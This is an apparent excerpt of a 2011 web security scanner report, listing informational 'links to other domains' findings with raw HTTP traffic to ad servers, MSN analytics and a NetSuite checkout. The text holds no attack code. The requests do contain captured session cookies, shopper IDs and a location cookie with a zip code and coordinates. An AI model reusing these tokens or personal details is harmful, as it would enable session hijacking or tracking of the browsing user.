Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 21:49:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 656

document.write('<a target="_blank" href="http://ad.uk.doubleclick.net/click;h=v8/3af5/0/0/%2a/l;240259258;0-0;0;50681858;3454-728/90;41815014/41832801/1;;~sscs=%3fhttp://www.computerworlduk.com/solution-centre/google-apps-for-business"><img src="http://s0.2mdn.net/viewad/3079224/leader.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.27. http://ad.uk.doubleclick.net/adj/new.computerworlduk.com/security2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.uk.doubleclick.net
Path:   /adj/new.computerworlduk.com/security2

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/new.computerworlduk.com/security2;kw=news,NULL,NULL,;sz=468x60,728x90;tile=4;ord=1303854538291? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 21:49:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 335

document.write('<a target="_blank" href="http://ad.uk.doubleclick.net/click;h=v8/3af5/0/0/%2a/m;238268643;0-0;0;50681866;3454-728/90;41171572/41189359/1;;~sscs=%3fhttp://www.computerworlduk.com/solution-centre/deduplication"><img src="http://s0.2mdn.net/viewad/2812318/4-leader.gif" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

19.28. http://advertising.microsoft.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.microsoft.com
Path:   /home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /home?s_cid=us_msn_footer HTTP/1.1
Host: advertising.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.myhomemsn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; 18987408-VID=16601209214853; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_NVR_RU=0=technet|msdn:1=:2=; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303649894761:ss=1303649859266

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 18:44:44 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ExternalOmnitureTrackingCode=us_msn_footer; path=/
Set-Cookie: MarketToggleClosedTest=; expires=Thu, 01-Jan-1970 05:00:00 GMT; path=/
Set-Cookie: MarketToggleRenderMethod=STATICADVERTISING.MICROSOFT.COM; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:44:44 GMT
Content-Length: 70966


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=
...[SNIP]...
<![endif]--><script src="//ajax.aspnetcdn.com/ajax/jquery/jquery-1.5.2.min.js" type="text/javascript"></script>
...[SNIP]...
<div><a href="http://mediacentre.ninemsn.com.au" title="http://mediacentre.ninemsn.com.au" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: Australia: ninemsn" omniture_products="market selector" target="_blank">Australia: ninemsn</a>
...[SNIP]...
<div class="AddLeftPadding"><a href="http://ads.kr.msn.com" title="http://ads.kr.msn.com" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: Korea" omniture_products="market selector" target="_blank">Korea</a>
...[SNIP]...
<div class="AddLeftPadding"><a href="http://www.arabia.msn.com/contact.aspx" title="http://www.arabia.msn.com/contact.aspx" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: Saudi Arabia" omniture_products="market selector" target="_blank">Saudi Arabia</a>
...[SNIP]...
<div class="AddLeftPadding"><a href="http://advertising.za.msn.com/default.aspx" title="http://advertising.za.msn.com/default.aspx" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: South Africa" omniture_products="market selector" target="_blank">South Africa</a>
...[SNIP]...
<div><a href="http://www.fr.msn.ch" title="http://www.fr.msn.ch" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="market selector: Switzerland: French" omniture_products="market selector" target="_blank">Switzerland: French</a>
...[SNIP]...
<div id="ImageRotator_ImageContainer44364_1" name="ImageRotator_ImageContainer44364" index="1" style="position:absolute;width:696px;height:356px;"><a href="http://community.microsoftadvertising.com/blogs/advertiser/archive/tags/spring+cleaning/default.aspx" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="image rotator: Tidy up your site and search strategies for better impact" omniture_products="image rotator"><img id="ImageRotator_Image44364" name="ImageRotator_Image44364" style="display:none;width:696px;height:356px;" alt="Tidy up your site and search strategies for better impact" title="Tidy up your site
...[SNIP]...
<div id="ImageRotator_ImageContainer44364_4" name="ImageRotator_ImageContainer44364" index="4" style="position:absolute;width:696px;height:356px;display:none;"><a href="http://microsoftadvertising.uservoice.com" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="image rotator: Got an idea for adCenter? Tell us your feature suggestions" omniture_products="image rotator"><img id="ImageRotator_Image44364" name="ImageRotator_Image44364" style="display:none;width:696px;height:356px;" alt="Got an idea for adCenter? Tell us your feature suggestions" title="Got an idea for a
...[SNIP]...
<noscript><img src="http://msntradeadv.112.2O7.net/b/ss/msntradeadv/1/H.1--NS/0" height="1" width="1" border="0" alt=""></noscript>
...[SNIP]...
<div style="position:absolute;top:0;left:0;"><img alt="" title="" src="http://c.msn.com/c.gif?PI=38824&amp;DI=350&amp;PS=40072" width="1px" height="1px" style="visibility:hidden;"></div>
...[SNIP]...
</span><a href="http://g.msn.com/2privacy/enus" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="footernav: Privacy" omniture_products="footernav" target="_blank">Privacy</a>
...[SNIP]...
</span><a href="http://g.msn.com/0TO_/enus" onclick="OmnitureClickTrack(this);" omniture_event="event3" omniture_linkname="footernav: Legal" omniture_products="footernav" target="_blank">Legal</a>
...[SNIP]...

19.29. http://analytics.live.com/Sync.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.live.com
Path:   /Sync.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Sync.html?V=3525&AQNT=1 HTTP/1.1
Host: analytics.live.com
Proxy-Connection: keep-alive
Referer: http://www.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; wla42=; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:823"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:35:42 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
...[SNIP]...
</script>
<iframe id="_msnFrame" src="//analytics.msn.com/Include.html" style="z-index:-1;height:1px;width:1px;display:none;visibility:hidden;"></iframe>
...[SNIP]...

19.30. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVNC6&AP=1025 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgEAtw5ZB7gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2362
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8038243-T8335901-C107000000000040026
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:55 GMT
Content-Length: 2362


//<![CDATA[
function getRADIds() { return{"adid":"107000000000040026","pid":"8038243","targetid":"8335901"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 30);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_436863456() {var adCode_436863456=new Array();adCode_436863456.push('<iframe src="http://view.atdmt.com/BEL/iview/262582811/direct;/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="120" height="30">\n');adCode_436863456.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_436863456.push('document.write(\'<a href="http://clk.atdmt.com/BEL/go/262582811/direct;/01/" target="_blank"><img src="http://view.atdmt.com/BEL/view/262582811/direct;/01/"/></a>
...[SNIP]...

19.31. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INV4QB&AP=1026 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 838
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8085302-T8295071-C11000000000032376
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:56 GMT
Content-Length: 838


//<![CDATA[
function getRADIds() { return{"adid":"11000000000032376","pid":"8085302","targetid":"8295071"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.msn.com/2AD0003I/11000000000032376.1??PID=8085302&amp;UIT=G&amp;TargetID=8295071&amp;AN=674253783&amp;PG=INV4QB&amp;ASID=f575577a529045d394748a69f1c3d63e" target="_blank"><img src="http://b.ads2.msads.net/CIS/119/000/000/000/011/426.gif" width="120" height="60" alt="click here" border="0" /></a>
...[SNIP]...

19.32. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=0&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=CP4HP1&AP=1465 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
Referer: http://home.autos.msn.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; Sample=37; FC01=FB=AgIAtw5ZB7gB3fW4AQ; FC05=FB=AgEAtw4P67gB

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1014
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8547859-T8195369-C47000000000042138
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:41:03 GMT
Content-Length: 1014


//<![CDATA[
function getRADIds() { return{"adid":"47000000000042138","pid":"8547859","targetid":"8195369"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 160, 75);}
tr
...[SNIP]...
<a href="http://g.msn.com/2AD0004C/47000000000042138.1??PID=8547859&amp;UIT=G&amp;TargetID=8195369&amp;AN=1798390312&amp;PG=CP4HP1&amp;ASID=1e955e4408ef46999720fbff4369eeaf" target="_blank"><img src="http://b.ads2.msads.net/CIS/22/000/000/000/001/257.jpg" width="160" height="75" alt="Click Here!" border="0" /></a></div>');document.write('<img src="http://ad.doubleclick.net/ad/N3880.SD132584.3880/B5030675.83;dcove=o;sz=1x1;ord=1798390312?" alt="" height="1" width="1" style="display:none;" />');


document.close();

//]]>
...[SNIP]...

19.33. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVPC3&AP=1455 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 820
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P7741909-T28253486-C80000000000018486
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:52 GMT
Content-Length: 820


//<![CDATA[
function getRADIds() { return{"adid":"80000000000018486","pid":"7741909","targetid":"28253486"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 1, 1);}
try
...[SNIP]...
<a href="http://g.msn.com/2AD0001R/80000000000018486.1??PID=7741909&amp;UIT=G&amp;TargetID=28253486&amp;AN=455688330&amp;PG=INVPC3&amp;ASID=3563c9fcf3b14f80abb738952097903d" target="_blank"><img src="http://b.ads2.msads.net/CIS/20/000/000/000/001/150.gif" width="1" height="1" alt="dot" border="0" /></a>
...[SNIP]...

19.34. http://b.rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVXTA&AP=1440 HTTP/1.1
Host: b.rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgEAtw5ZB7gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 1281
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8614954-T30580561-C1693696
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:57 GMT
Content-Length: 1281


//<![CDATA[
var contents_86 = '<span><a target="_blank" href="http://g.msn.com/0AD00001/1693696.1?!&amp;&amp;PID=8614954&amp;UIT=G&amp;TargetID=30580561&amp;AN=1243218938&amp;PG=INVXTA">Join TD Ame
...[SNIP]...
</span><img src="http://ad.doubleclick.net/ad/N3941.msn/B5325532;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?" height="1" width="1" style="display:none;" />';
var fh_86 = null;
if (document.body && document.body.id && document.body.id.length >
...[SNIP]...

19.35. http://c.homestore.com/srv/oreo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.homestore.com
Path:   /srv/oreo

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /srv/oreo?c.realtor.com HTTP/1.1
Host: c.homestore.com
Proxy-Connection: keep-alive
Referer: http://www.realtor.com/search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 26 Apr 2011 18:46:19 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_jk/1.2.5
P3P: CP='COR CURa ADMo DEVo PSAo PSDo TAIo OUR'
Set-Cookie: HSID=561c652c36_R_63:10.160.4.250:369843579958:R; Domain=.homestore.com; Expires=Fri, 02-Jan-2043 20:32:59 GMT; Path=/
Location: http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R
Content-Length: 225
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1

<html><head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://c.realtor.com/srv/sugar?hsid=561c652c36_R_63:10.160.4.250:369843579958:R">here</a>
...[SNIP]...

19.36. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /s.nl?c=1142057&sc=4&whence=&n=1&ext=F&redirect_count=1&did_javascript_redirect=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=1142057&sc=4&whence=&n=1&ext=F
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187; JSESSIONID=RPwlN37bBGN1BHsvqNxQ1vGBsr26W2BPCyktJKKZMYNbn8B0yWp44RPTyL4skYr9MQJLJQclG4l9NpdBQ6NlhFTGlWJt4trMCxT6LyM5FzLTxKnn4bw07h6pskHCrpHz!534658191; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; gc=1142057_clear

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:41:25 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256033290:616363742D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: gc=1142057_clear; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=915
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 83852


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Library.js"></script>
<script language="javascript" type="text/javascript" src="https://api.qualifiedaddress.com/Scripts/Qad.js"></script>
...[SNIP]...

19.37. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=appnexus1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1303851120/build/system/def.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Found
Location: http://adx.adnxs.com/mapuid?member=181&user=CAESEAYDROJIBlXAxjjwOAYYXzI&cver=1
Cache-Control: Cache-Control: no-store, no-cache
Pragma: Pragma: no-cache
Date: Tue, 26 Apr 2011 21:51:04 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
